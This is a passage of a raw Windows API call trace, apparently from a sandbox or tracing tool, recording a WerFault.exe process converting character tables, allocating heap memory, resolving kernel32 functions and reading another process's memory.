!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ岞蔹", cchSrc=256, lpCharType=0x4c1ec78420 | out: lpCharType=0x4c1ec78420) returned 1 [0078.329] GetLastError () returned 0x7f [0078.329] SetLastError (dwErrCode=0x7f) [0078.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4c1ec78120, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4c1ec78120, cbMultiByte=256, lpWideCharStr=0x4c1ec77df0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0078.329] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0078.329] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x4c1ec77be0, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0078.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x4c1ec78220, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x90\x05", lpUsedDefaultChar=0x0) returned 256 [0078.329] GetLastError () returned 0x7f [0078.330] SetLastError (dwErrCode=0x7f) [0078.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4c1ec78120, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x4c1ec78120, cbMultiByte=256, lpWideCharStr=0x4c1ec77df0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0078.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0078.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x4c1ec77be0, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0078.330] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x4c1ec78320, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0078.330] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x7ffc19d3ecb0, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\system32\\WerFault.exe" (normalized: "c:\\windows\\system32\\werfault.exe")) returned 0x20 [0078.330] GetLastError () returned 0x0 [0078.330] SetLastError (dwErrCode=0x0) [0078.330] GetLastError () returned 0x0 [0078.330] SetLastError (dwErrCode=0x0) [0078.330] GetLastError () returned 0x0 [0078.330] SetLastError (dwErrCode=0x0) [0078.330] GetLastError () returned 0x0 [0078.330] SetLastError (dwErrCode=0x0) [0078.330] GetLastError () returned 0x0 [0078.330] SetLastError (dwErrCode=0x0) [0078.330] GetLastError () returned 0x0 [0078.330] SetLastError (dwErrCode=0x0) [0078.330] GetLastError () returned 0x0 [0078.330] SetLastError (dwErrCode=0x0) [0078.330] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.331] SetLastError (dwErrCode=0x0) [0078.331] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.332] GetLastError () returned 0x0 [0078.332] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.333] SetLastError (dwErrCode=0x0) [0078.333] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x6b) returned 0x22b349c56a0 [0078.334] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] GetLastError () returned 0x0 [0078.334] SetLastError (dwErrCode=0x0) [0078.334] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.335] SetLastError (dwErrCode=0x0) [0078.335] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.336] SetLastError (dwErrCode=0x0) [0078.336] GetLastError () returned 0x0 [0078.337] SetLastError (dwErrCode=0x0) [0078.337] GetLastError () returned 0x0 [0078.337] SetLastError (dwErrCode=0x0) [0078.337] GetLastError () returned 0x0 [0078.337] SetLastError (dwErrCode=0x0) [0078.337] GetLastError () returned 0x0 [0078.337] SetLastError (dwErrCode=0x0) [0078.337] GetLastError () returned 0x0 [0078.337] SetLastError (dwErrCode=0x0) [0078.337] GetLastError () returned 0x0 [0078.337] SetLastError (dwErrCode=0x0) [0078.337] GetLastError () returned 0x0 [0078.337] SetLastError (dwErrCode=0x0) [0078.337] GetLastError () returned 0x0 [0078.337] SetLastError (dwErrCode=0x0) [0078.337] GetLastError () returned 0x0 [0078.337] SetLastError (dwErrCode=0x0) [0078.337] GetLastError () returned 0x0 [0078.337] SetLastError (dwErrCode=0x0) [0078.337] GetLastError () returned 0x0 [0078.337] SetLastError (dwErrCode=0x0) [0078.337] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x130) returned 0x22b349bea20 [0078.337] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x1f) returned 0x22b349bcd20 [0078.337] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x28) returned 0x22b349bcfc0 [0078.337] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x2a) returned 0x22b349b97a0 [0078.337] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x31) returned 0x22b349b9660 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x3c) returned 0x22b349b8ae0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x31) returned 0x22b349b93e0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x14) returned 0x22b349bb650 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x24) returned 0x22b349bd1d0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0xd) returned 0x22b349bb890 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x17) returned 0x22b349bb570 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x2b) returned 0x22b349b90e0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x15) returned 0x22b349bb850 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x1b) returned 0x22b349bcd50 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x17) returned 0x22b349bb9f0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x22) returned 0x22b349bd3e0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0xe) returned 0x22b349bb750 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0xc1) returned 0x22b349c07f0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x3e) returned 0x22b349b7e60 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x1d) returned 0x22b349bd0e0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b349b8540 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x12) returned 0x22b349bb830 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x18) returned 0x22b349bb910 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x1b) returned 0x22b349bd290 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x1e) returned 0x22b349bcdb0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x29) returned 0x22b349b9120 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x1e) returned 0x22b349bd2c0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x69) returned 0x22b349c5420 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x17) returned 0x22b349bb950 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0xf) returned 0x22b349bb870 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x16) returned 0x22b349bbab0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x28) returned 0x22b349bcde0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x27) returned 0x22b349bd2f0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x12) returned 0x22b349bb4d0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x21) returned 0x22b349bcea0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x10) returned 0x22b349bbaf0 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x1c) returned 0x22b349bce70 [0078.338] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x12) returned 0x22b349bbbb0 [0078.338] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349be490 | out: hHeap=0x22b349a0000) returned 1 [0078.339] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x100) returned 0x22b349b5f50 [0078.339] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x1000) returned 0x22b349c5ee0 [0078.339] RtlSizeHeap (HeapHandle=0x22b349a0000, Flags=0x0, MemoryPointer=0x22b349b5f50) returned 0x100 [0078.341] RtlSizeHeap (HeapHandle=0x22b349a0000, Flags=0x0, MemoryPointer=0x22b349b5f50) returned 0x100 [0078.341] RtlSizeHeap (HeapHandle=0x22b349a0000, Flags=0x0, MemoryPointer=0x22b349b5f50) returned 0x100 [0078.341] RtlSizeHeap (HeapHandle=0x22b349a0000, Flags=0x0, MemoryPointer=0x22b349b5f50) returned 0x100 [0078.341] RtlSizeHeap (HeapHandle=0x22b349a0000, Flags=0x0, MemoryPointer=0x22b349b5f50) returned 0x100 [0078.342] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffc37f90000 [0078.342] GetProcAddress (hModule=0x7ffc37f90000, lpProcName=0x7ffc19cdcff8) returned 0x7ffc37faf030 [0078.342] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetThreadId") returned 0x7ffc37fae7c0 [0078.342] GetProcessIdOfThread (Thread=0x38c) returned 0x69c [0078.342] GetThreadId (Thread=0x38c) returned 0x8cc [0078.343] GetProcessHeap () returned 0x22b349a0000 [0078.343] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bce10 [0078.344] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x18) returned 0x22b349bb610 [0078.346] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x160) returned 0x22b349a17a0 [0078.346] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bced0 [0078.346] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x80) returned 0x22b349a4a30 [0078.346] GetEnvironmentVariableA (in: lpName="MSCORDACWKS_DEBUG", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.348] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570000, lpBuffer=0x4c1ec77390, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77270 | out: lpBuffer=0x4c1ec77390*, lpNumberOfBytesRead=0x4c1ec77270*=0x40) returned 1 [0078.348] ReadProcessMemory (in: 